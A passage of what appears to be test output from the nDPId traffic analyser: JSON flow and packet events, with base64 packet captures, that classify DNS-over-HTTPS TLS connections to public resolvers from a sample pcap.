CaH7DzSlA01ud99lTK4rI7nRSGX9tAnrwTrORIzDrntkMH1VggJmMFY3EGxAMzh1CUd24C\/NVxnQ9P5qmX0Sgg6uSgxO2c7COAq2edHC\/ucd7dmb9rLGiOGU7YGRxfXuPTU+xfVNmV8wvcxQY9WY3QcHJbT2Vz2Hldj+q9L+347LUl4d5nRCyZOpijGWSFFM5lFqup\/GoObWXXvMsTO9NawTXovnf4MnjeZczPg2FrW3tlX0uBW7P24cE4VNHjvnvHknCsLft2dOFPhwAUA7qVOuJixr0stgCN8eCmK\/n1WzppsTm55hMBmYIkE9rYwxrxXiN39LFT+j0SlpiMqf5n1b7aJjSjiQjm1\/T42XF5prhRwaxJyOBzS5a2w2BxZDhOvMuBRY6ZtDe+ptzu07\/eUIO\/cQq36LXuMCRYTHNEIXnWWtA0vjAcmq+EwSCLEygFwVxoPgN5h2qTp7SdJVushbBgsziLiKFyhenEAkjP4tYMg82sWXtGvK2T4GbMrKF+OJsVll7gTGHENl+vuBtGryghKs2kRZov918dT+VWdywju+ew9zl+S0NiyZlvWu+CmHSGFpvtCqWMXNaXEERtmXJVFofSJ7ykCfNo49lq+tJOi\/mrPExexfpWVgisqVMvGukP+ZkhcE5Ck47mFMZqfJTRL364HqGaNbc7EKIab24NToEVrdLyvx+sQZXNXCyXhOVxnIWFgUdF0PMAFDvMwWrgJTufvZcx1q\/rK6GjKie1KAVcLQPkAeyb2aBh0GehIKRHB5OLWsjRXWSnC7RfnFW6K8cokr6NiSGrPTHJtZfW+014hI265qPA0R6qLZ3SkGPsU2l+ULOh8f4TsNZmRbk\/UzcCp9zJB2\/sAwMANTEmXxPw2yMWVIdXVMdzqrOV"} +00949{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":504,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739402059,"flow_last_seen":946739402097,"flow_idle_time":7560000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3189,"flow_avg_l4_payload_len":1594,"midstream":1,"thread_ts_msec":946739402097,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.54","src_port":57058,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"rdns.faelix.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +02345{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":505,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":946739402097,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1444,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1444,"pkt_l4_len":1410,"thread_ts_msec":946739402097,"pkt":"ZmZmZmZmRERERERECABFAAWWZpJAADcGH\/ou48g2CgAAAQG73uK776KtxxCRm1AYAfUU3AAACNSc59sPW4OZKm6qSD7jsBvdulSTgK8LagzUdpT43FqU1TjbgFd6vr1YcfE0NFplErjVqY14Uy0e6vIiPxevgsH6OdIHZm6pvnG3NGQZr+Eawc3lwPRCg\/OYwfYOVATUQ+D48eMINi076ymhr9WarR1T\/muiarwvLXYV6Uhar7rOYnX1fnOldHU7V9Vf3n22jVlaRu9FvfUlIGCuR9DlhblioT6Pi7Xq+9B1pOrzTS3d2OyN7sMIE6PuhUF9VrXN4uLhsAemVKcWU2V+BGjWtfszG7hr7paN5M0A6WlSiJP5ugBdx739u3B3W1+KfLwVvbAx3Uf4RJvYnlmACvSx012Jhzer\/yuM4tk3QVpBdK\/jPEaTPWBaLG7GbcEgCr8Dd01cNEaknAYaE3S81foMCYQWnkCSEzXoXSN2X+GKzFZl0S1\/cEXQGO2yVQzWkPUMhh0gTbASy1MtoPkBs1VLmccZG6VMIanE\/Pd1\/AmN+44wbWDJ+AcIisgRr14kHkecxeo6qEPvRckWi1Y+MB43PdM38kIUuB4ny7fwppqpmv8DILGQ0779kEvzfVRiZrCYvFXu\/QOSUdvmxjdD6cpAlFDWsPq2Pc93te5jeGVaL0ejtHRLIxI7z\/Q501zSpx\/Cya9ypg5U1NAxSXKe10YJjCTWrmOYKmnYerWRan08XbdkvYLJUzjKsspm7dhtxg0E1f4GsSbQFVWwrs\/ZM+C5sBOiJWUOh2pogAFGGsfjjO9vzloRUIbA2Ux9PdhnCAwgsxjwIpMB0l+UdFEMsbPJQhlOxGEwe2dnsCm5A+xtqvz5mH9nbAz2uU5hDs7xBrPc+8iDApG3YcmB6tDQMRmVl4wND49H4\/Hb2EGewuCKV1\/lze0iB9RIgI9rfK\/5kPRVAptvZ2+Rek\/4ghlbEG+l+OpOmeFXbOF8BuB9O0sPArzn0gERY+1PqlX8USIY4KAapC8vGnRNqePUVgog6kgSCom8jkuyrzOHCdEM1CnPySLw7a\/tPZxODv2GVX+BkBTvdcEhFOjQ1TZSMjExVd8xloEm8\/FJ6+H0jkz8IvfKaJAX48951TiRuA57Va3CSiHx+djtV0dMa0UJnQcAEaubJWYUsRu7sYXVg8tQm7wgM9eerw0ql07SNc\/dHQUxeGfY6HDVaN4jlbWxp48tTf5vFa+VilGPTo45486GBOKU+5wyUckgVnRpF60eC3RcISu3IMve+0In4k9R88DIjvwS1SST04NZPv7f41CsbwoBIpKZKJAFU+NplzdS0BOyBcGgjEAzzOtpFJ7jXjBK8x1DEPVeN6HSSbNaiOV7VevW0oBjFRBvVLEmxy48HjBSY3QWjS+yqFN8Qy4bledb1fb4GI3oWPT+BRcDAwEZfpmEI\/d7cy4YyqdnKDwIn\/k3qXWNAj2sXjRKguMhqhlkOdUvzFkzzM0xeuvfwnq6QSn3NpKskeWNBR8K+ECaE3mhCxghdnhLIum9rgOMvkgnfyBTDAfYKNN\/d62vQY6u4rbxXpDQk04FVnBPxSfPHXuC+oF8kMOU1++DK+ZoETlcuLrk2BRjjMQpK7pf+k1VI6pVnOclLhCXYHQjMUHZufh3HVG3mM7BF+lzB0K07EInEh+Ccp7LdqMGfKnUNXPWyokhcE9BzZJT2yWb8DylKWRWvZNetxzugclU9IhwHPPfcLEVBg0Fudoqm9ZGps0h7H+c6XIpsbql70txNRPE+wXofhHvkqNoGKLp9YrmmnKta0xlevWHOwMXAwMARTi1\/bQ1JQowGKIWBX\/iwQMAp\/a2d7gVFXnQQSu7gEMDkgFlDNq8l9T+VqanQcvXHm8wx\/TYqk2+tBPvp+6SO7GVVfwN5A=="} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":539,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739603327,"flow_last_seen":946739603327,"flow_idle_time":7560000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739603327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51846,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00847{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":539,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":946739603327,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":339,"pkt_l4_len":305,"thread_ts_msec":946739603327,"pkt":"REREREREZmZmZmZmCABFAAFFXkZAAKYGop0KAAABCQkJCsqGAbs6mTvywXrNXlAYAfbUBgAAFgMBARgBAAEUAwPEiPyvZDyiU8chFqn7v3nOV\/W\/daCFgBrWvLyeLgdOBSBmgVOewdr23+YbXlV2oJqCio3+iP7mE\/SqSoHvhanHngAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAClAAAAFAASAAAPZG5zMTAucXVhZDkubmV0AAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIELSbbeQ+1Z\/PGkzWYpOrrGvdC\/XSIyiiMDimHGqOwN9"} +00902{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":539,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739603327,"flow_last_seen":946739603327,"flow_idle_time":7560000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739603327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51846,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns10.quad9.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +04538{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":540,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":946739603346,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":3068,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3068,"pkt_l4_len":3034,"thread_ts_msec":946739603346,"pkt":"ZmZmZmZmRERERERECABFAAvuVbVAADsGC4YJCQkKCgAAAQG7yobBes1eOpk9D1AYAHferwAAFgMDAHoCAAB2AwPPxPF58rRx8NlAStddGtWmBxk0TsgFRMyjmLE2UJLzOSBmgVOewdr23+YbXlV2oJqCio3+iP7mE\/SqSoHvhanHnhMCAAAuACsAAgMEADMAJAAdACAXimL6oC2BgKKkKv2GFQZ0YvKv9UBLIqQLjYesKsDOXxQDAwABARcDAwAgsv\/aMwoaVLJwBsdUrBspRDIe6WOUfDjyPvz9+wtEYK8XAwMKaJbt\/ye5NqlSM6\/tOfe9bC5ygGHuvTHGsEkug50mliwDXC+zbimuaXpevBCVc6v4emlocpuYSolXpHjPLZ5mH\/n\/Wwg\/zT8DKTys1phOBjndqMIJ26DAd1BULzfsS4\/LPzxUrBzIWvX6A2LKLmwvvolWTixlKxXTGAwoKmNpvOmmolp5p0KnP+05uqYpZwQr1eiVG4Jbxo4RKPp2m5qudj526IfaIUxv6TymwnkyKidb8KJ7fECEEmqDTEJYi3AMqq0F6jVWm4S\/Cw3xWxFHQLXfbhWl\/xQNbH7sQr1+VP1aT1KVnkPOnmrjsvXKtU37nhtNVagiwB4tTsa0XjgxO6nNrduMisjiP1kYOcjiQ52IvQ8yUcLxoVZvs66brT2XF4X+BUOjv0f2D+iKuSPPaodKDokIKfB3EFHwrxtXROObndCkt2l8uoO\/YFwn4AVaivPS7QA9y1ZB5oLifA+q5b\/fsbKJUohIzT23SgYvI1FZi9km+tWoalj+0eMzm2XcwysPa97vGSKpeXtbzhnBE6t0DL+SCNAkdyN9iZf+SkkYuc1rpy8H6FsnB0MNHcLT\/7h9UpysD4zCa5uCyld0qhDdV3MzU7a7heBLLZvpkeoMCMY0KW7Nghl3Tf2jMPhPpMXgWhDsiEqTDOOStqJ6ji5D3nXcz67NA7onASlOfxCYNM8r0u017+zZIe1OE+PpBYW8chi30ujo48vE+6Zr1LXdzMZq7SQ9KcvNds70bZNXXOxSMjMXLVZIXnbsRiW02iiUe4S1V8qA1xoY+tL3PM\/3KBP4ZSUn0i9oU0Zm0bhbtwOS\/9R3KZPgmCI+1g7zZ+sqsIKC0g2uvkEsdNIqhrXU224qW6xxP\/j7fBBrVPw5fuLCU7p8+Yh1Cpxk4zFmUhl0XbcAlqLu7rHI4fQoDUdIgemBLeSEl1+Y\/z6KYsqD8NYrgKAvSsbZ1H\/Vdb3V1ajFVEUtmvJbvjf\/83uaxbTgecYPCPp7fDTlwk8SSHepVo8KtWsduLEs3DxEjvauvr9rL7FbVuDjSA3SeEqhFhGtSYJioWjgprG3WdpQzYP52GvnOKwXu7vjaJad3BS\/DxKTEtPTMDE4Fp6cDirnN3wrVazuNyc6gO+xpNalCZ8Rd4w5DmHczo4DwVyfZ9Fxz7k2fB4TnNz9ILT10qjnOlN\/ksy+JVVDJTTX6v+Ua3SCh6Bynhcuz7SktArn4gMoxcY2E4z4hIcGQHNkb+py02aK7EHGVgPR74HZosi0lhtUl4dpwbcfDHkQU+oVloy53x1IxuauA66S2qPneNDmRr8rKf9GU\/LJH2dezQ+WudmVZtgHXrLWtjuFmnH7eaBODVb8UwsA0Ge9wdJPfbyaGd7iLOv94vz10GXsEVy\/CXkZZhekrbvjToLvfDqaRAilCzMBHwybWhwwRUQsUh\/rPF7FXEJaXHA+eAZPWEuEetxByN3cFbJKFAiJ4IoKIRBIkGZxaTOcLn\/+XdFg3+W\/lMlmaqOUp903NihM97Rw4Bpqxex1vlYSLEh1ll9uJAf5iJVYMcmiqcaYXWfQOEXWR1wEE7wZE1+wo9+np3wP\/ty0jb3vy8+oqDWA8OdUjkdhqeUyfjZfa6t7pr4ITQpHLy0bNHsZ48wim0yu3Y7a6artue3kmQYcW2RckDOWxjAYg9ikO\/kwS062tZFHnT2VanvAd16qor00inyMS9VT8p\/085mt8kQkGSG0rip8q4xWZYbMFCfcEVkD4E5q7utpFEDkZ964uRE2Vw1PzBHn62rcmtvUqQaoGAFjFlHLMS40f9r+HKG7wRWTWQ29d16NsH+Xu0qXRhzWgjImijKWlv6KBGT1Cxynn\/KrehvF0361FyBUkJo1S1Ztxsubdf3ddeGeEr99d5oc\/xgpXMAl6ZIfUBPJjnOeC932\/TOOjMzG7PhOgunB+ggqQ5LQc0CX3c5BLlJtBtobycDsl7t\/eLrX\/bMfWq1dBy8SxYnEvGbNHrForDiuOA\/0lI3GVO62V5P1dM2BK8fdHneO0FhK969xszY4KacAP0CD5Aah0NJ2dzSGVZQtRmv\/TuFZlUQB3cFfHJYpNMU\/sn32bfB7GWJI2MhPEITiLal7HIPxgTikeJcDL13qUn7bk19T+rXcadCGiBoKDb40Dx6ogDfm4H0pA9C7OZJC0LRf01KZZRBjQs4x5ewT+p6+Og3SFrrTJ8ObJe\/TFocDQSMCBCWHQJqFicRtnWl4mmw+qTCsSoZQ\/ibkZFi+igS4TWV+31tPjazydJfOrW9xLZSgCilkMeJWYl8vH1ijLI+xCM8xxlQj5svlwHqvt+EkteECF3EKEt55AWpnRTNzzJivCSHy2gGPxW5UKKBkiSUoPFh0qyVjKN5HqDcW5MrFR2HpLqhuRbEXoannFiepiMp6aCVRMgYzvmQIyFH17\/3pokulHalnqX0gFQkjPqUPYf6B8\/o0H5LL0kahUiyL+d6BqSr8d42vsjYrpSfDaIcCW+FFGcj\/61Y6Fdihg57b1nq47mVWBJ9vcfq6xagmjwoJrNbwHaDS0XVSxL6y45zWrDfovrm0VvelVEdjwsn0FcoL6zZxDjjOt0EJP+OSVXcMeuY7uIG+KTnnHoV0vMvgMsIMiJbtYXgvda9zrqGty0FDqsOWmIdUCMf7t9LcgXTVP1POJeyDb0J4B38BTX3wUkWV7Ddf9ih9u7A\/m95uqIUbBJE2UeEbEEHif0BvcJl8E3UGeXVNiKRj7lxmplRVER7ystoW7OIAwNXC3MbNiwrjMNGlyZxeIZvGJIjHlQuApwLZsjzZzABT3\/zDbS43YjZzqyO21cEI3xf5DfWK6ZyU3Gjytb2PX5Te\/wOkKfusuGJNyYU73DNCw6\/IA2qWOmaw7\/mXzErXE2WxarQFcAU6el9VnuyWPJs57xlszen8XWYD0zQcAkiZ9pBOymEDFngWCP8+c+AEG42RtW8heXsNn6Oe2ZAWO\/0AXBzQr+rO1qlWDZzv3V7XELPKS49M71P\/6XXdYRKeCeHIn9vIc91j0OnL7GZzEPRVrpELGmw5rN7x6AqDoK3g\/LGcF47Fu59pwNqH3h40OLoshBk76izruGCqusL4Ms6YFarwUJkiUBlvhjjR7yHu721yX53PmlJXwCPueaRMxPhyJUl4AErQ3xPn5KAYXOjk3\/LnBLmSDl4f8PDkxmKUVaitsKqWvpl1TTX0fA2ZAqmTFey5ifEjBKLesy4caeyeCMEZZjMOhPX9MKfIEGous6lHCaZSQQHUSMY1BTylXmW622\/10lQS8aN1mce++r7\/TAswiTbum59NRH+1WXDpTaq5aRBgs7Pc6pr4lABNwxmieRHx0ER8V5gmxNVB9ACpzjEkp28DmYAH1\/iiBQfjkW2oblAVhUqcezWZUUEbpTbTAEj81Dzg+Fe2EsJFV2MiLhqH0ZMEkKY9oMnGyGvqY11wK7Qf4HXmtakoM3CF+wPbb9he7ffoRbYXCwbxTcDrBSEJdjOMhsSClbW03C9LGM4s6RAprMpnuw2wArtlzcr4bo701pOupS\/tdL5NkaZ2ZzsCChcDAwBgOnNpVcvc5YFZ3YuA8YRoqsuLDn4GImAnVqFIX3IzoTnZe29KOqUXQC0V61jJdr5Jnb3k3MOCdTH2u+HBBkKmYvlFb8GpDbcgObm2pFs9vNSY1WNyfnlLuFSQCBkHWe0UFwMDAEV7D2ZJm3CG6uFedmkozBwacoDrnHkQN6RCxC8K2l8lcKCSu3Q0j3XFRWsykB64fgtOqxtlPlxXpmtKrFqiyWDCeX9Q+Jw="} +00944{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":540,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739603327,"flow_last_seen":946739603346,"flow_idle_time":7560000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":3014,"flow_tot_l4_payload_len":3299,"flow_avg_l4_payload_len":1649,"midstream":1,"thread_ts_msec":946739603346,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51846,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns10.quad9.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00571{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":541,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":946739603374,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":946739603374,"pkt":"REREREREZmZmZmZmCABFAAB4XkhAAKYGo2gKAAABCQkJCsqGAbs6mT0PwXrZJFAYAfXTOQAAFAMDAAEBFwMDAEXJf2y8xWhMhAZA2WXz9agwI9f91RKP49sWLlsKAqD2Anz18+mnUXeRrd7MefwrF\/wulkzvUzp\/PNHsE\/j94eCMWT0CzeI="} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":551,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739661512,"flow_last_seen":946739661512,"flow_idle_time":7560000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739661512,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44704,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00845{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":551,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":946739661512,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":339,"pkt_l4_len":305,"thread_ts_msec":946739661512,"pkt":"REREREREZmZmZmZmCABFAAFFx6JAAK8GN2cKAAABuetRAa6gAbuz5lknlG0\/21AYAfbM4AAAFgMBARgBAAEUAwMfgFJ2Kafn6OC8bsQNsKFbNXsDyxgypaGgbuYoVgNdqiAeN08qEmNJsvb5yXXS9i9uE1kipCfBRoZuyc\/JvsnF3AAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAClAAAAFAASAAAPZG9oLmRuc2xpZnkuY29tAAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIIH2RRfX3PNaXYMOoXj3ynNGqfHChI6\/gAXerDGvzggi"} +00906{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":551,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739661512,"flow_last_seen":946739661512,"flow_idle_time":7560000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739661512,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44704,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.dnslify.com","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +04683{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":552,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":946739661535,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":3168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3168,"pkt_l4_len":3134,"thread_ts_msec":946739661535,"pkt":"ZmZmZmZmRERERERECABFAAxS7o9AADQGgG2561EBCgAAAQG7rqCUbT\/bs+ZaRFAYA+rX7QAAFgMDAHoCAAB2AwOIv9853ekbZoNmLmgcqNPyyS1j9KmZm6LL1EB3x+W+MyAeN08qEmNJsvb5yXXS9i9uE1kipCfBRoZuyc\/JvsnF3BMCAAAuACsAAgMEADMAJAAdACD6x6OWYowjGpQ7hpL1\/XAvKAPz7Qey4KV7v02zhqXZdBQDAwABARcDAwAgyc0HM+W8H8TE3DEJWTZrLIbavzRZjtX85L8RdcWlDvUXAwMKE3Ep4ySuvwn1mgGngq567huqNt4kq0krhrI\/h93Xu5m86O9X2PLgikjAQ\/f9b0D4TlJnxV9cGU04GfVlCuVdBuDl1OIowNDzv97yB1hnS\/nmnSeVxy1F8D7\/C2lvCqf2cxAVE09ueyG1Z8bXZ2QECTYKbWaJhHhH3grXMLxM9TK7dwfYp5ry3mgBLj8Im1sBBtK1ijR5DOPlXD4i38GWBdXuEFX66BB\/RJoRwVEIncNbQelSZeCqjUb3u++TUwMNQylDBUpnEAe47WxBvCiB3j4t00aQSmqM0TAluU8dwn7tiUiJEwAYZgDG8XeCA2d8CwkyaaNUs0P3Rp5Ub77dFKLlWkM7Ox84gnAyRhVMHCmMumYMkWKlAivuj\/eXgWwWByB6smKGxdGHvMorcYTbQq9mZYmNNNkDPDaVaw5533PFvpx4ba99q1b36RpLWXBUvp3e8mh0pBow5UcR930tP8k9y3Mp\/Hul\/USMW6fOtKvrODulyByiQtZSjqe6z4\/9jz9br68\/R0pBmxYIdiwDh9sAHDejB9VSYvk7ssbBQpn+Jgwnz6Ryy+sDgPoInVRafSLVQ2XaqYm5f6C0Jwzhr6UtNZ4\/zNTcpzOWnfrCB0SA4OuUkh\/XzE\/16DFk8ZQDliBoueyPhn8cEizoLe43IQ4BRx1FGhFopJsvL2cINLJIZh8DTM\/8W7f\/ASccXTbKN3NreGL2zPJ9HkyArzmAuS0H6AWBUpZyjU0X4LPypLaoIp74s3Z6LMGrDv+Q9HPcSM3AsvYaPpVMikXZgrncjZjmSO3nKjVK7tuPHzmBxV2ASbUY9dkYy7qS1LbwD5HCaZkMJLquTC43\/zrZa9Cf+VJlQO+7\/bTkI19jV7MBsNxvCJS3vho32OcNSgskst5WCDisQYxOEJ7yIiJ4Qj131r3komITCdIi6sfPNECBD925ao9iSOw1a3NghVbKi1Ke9+osy6p4OIfl7R\/jJIRkFpjTHB9lrhuKyd3x90HahF\/Bgrc+0OPDW3df50BV25QUTv0YHg583iZZwuimhgpeeN8oRbZn4Oz1sb61wMILMVA1YkIFgELm6QWH0EjBDa5PcdPXwcXSRAXJR2\/zX8giHU9oVoqfNaIjA+SmyaolS9o0C9Gxx9xhkTFg+SAbN3Goh5osUJrTzgif84rF3v\/clkf8\/ZhPyDROa9H0yWh+TK3VY9NLRXxv12lS5FZMqutTNAtmppSaz1n5imbXVp1Da9\/rGuGJgyHbUPRjpcY\/qQ4nrdYPUt0lBpjbxywR21B5bH94VrAutoZgT1NlpA1fjy8uX6CC\/PzzpWgwoLz2\/ah06JLAEuj5ndY\/3P\/Cea86JZSQRIAOkxHfXLLrlrueGx1dvDahl9VAk02WVblMiy86oo72YX2jdNNf7IRMOaPtI08s6slCfPDpn3bANNyLKCX6T8oskMhdiK\/HIjCb1KyAdgQ2+yLvi3d+MuMeWmC07amcrbn+OTYQQNPWx6i\/o5VJfAp896EdOSd0n7JnPYzTA1M2RyiA5D2thGuZ18x5oW4andkKefpZLKocbhraKqdRDR2qHe1UOjP7ac97YdAdmgxzkuJnD41fZ8SEi5Zg3NfdmEEfpkvRjC5orTLd0fIsx5c1+XLU\/R3b4bQM96DkiRuZJ1NUlIhf9JvTA7QhsNS9Evhm+KxSrzo4fPncRHMt8lm5+VkFq5jZsS\/4aS9tmtMGO7fcr\/LpSveCPtAloCQrU+vhpaXaC4\/SCuRji5PdK182R618OsLro46yH5FqoSw3EFuupxW4KHdDcJyAmbvTP3RLz1SxCnflYoAqTczyrDRGBg9\/VwVoEVI1F90s2UJwdF3wAnZAvtsFo0aX7P\/QLLigT0+21EtehOsx99nALYpQP+Wes4pdBUuuM1hrGs4phO3GFIyYVSCdORl3bwKcDgUn6jxeA5jLALqAkUQz6oQZAw+UAmaFT7liB5ZMHspe2Nk5qb3bDaj1FmXHIWt\/85M5M02qebtth3yNCkr6Yp8QH7DkvUBEcBvugZfGdO8uohym\/eNU58r4tZ+dX\/tuHtfYu\/HTthyF6zJIA5NCwZI8ZPOa0Ik2ZVHuDdccBZzRFIr6iS6N658h5UD2w34\/Zc25OfWHIIyNU8f8\/IYCk9XVJNve0Okk42KtkEZEvU5b0G1QgC8PnK8r+XSR+vGYlx30IHhP0Drstay6UqCpdjb38zyt16Qx9KI1K78\/2x0ZLR7g9lNe5aJSm2DGdBsBLk1r5a74FD95UK8Adgld6WS3J1isO2nKe9Xs1y3yG0BHL6PVzcVJ6xLZkhyj81HERDbvsw89dCQ0RJq5YmEae+boIDnKyAnLYzUgmbMRlc1g8JOgQmr6\/NRcNQVzPj9Tmr7h+4nauDzZ0EwSB6bpnhekE6zTzsN8ksFy6WPV1V2TWaFMCxIJpm4tqxJloTCvFyT3CBtW57hPqqD33WSzMFQ4mYuH5Kgu\/JydyuTxbX33iR4YxYd7QhqiqEqf7Z40jPc99ZwAIj52PTzQ7U+ojkqP4MuUynWiVDvS\/8M2\/Vvth6PA4ClC+NG9V0jqT2CwEy0LU0ERe0qEd656+zZx\/fgC3xfIuWV0svyqgeH7U8anrlDCpp7N40O2SWqb3L3JMSf4o49g5Y7jySS1fW2+m5VjaQqCccoq+\/wn0QIhjH7Xd2oER1gcyADsjGJt5aqBudWst9NAdC7\/E6mgwXOhZmtXb1lcPmN1A3ldDXRkgXTncFzTkiGIgqqygowkLd1h\/u0K8p6hXN6SporJbwLrTenWrNDIG63gFBLm2D7U+S642eghPumVgo7B1N6elGvUpSDX3m8qB6zRisoSKoWKWO5xgUo0OWMndotDAaZPAq3bhL2Pxzdl9WOKnnP6NOK4+F4BC3OgZgYIEUhrknbM3wBtdHfsfGuj0RFj5lNw2AlFe8pNBDRkjYdmUdc0f\/vnWwnfo22NWKX1BdiVu7196lmWb3TQ4gFhlK81yNy7eFJuFbgrYZ5PUlfjIwTDgxIXshraxns8270zwqor2u3QZYQoN4I1EUcEja7lh2qdAWxfca\/zxpKtNeCFUm8zfvAy2hjwmAqVnw7n4Et+Xyf9ksFEQ4\/qzsOHpBM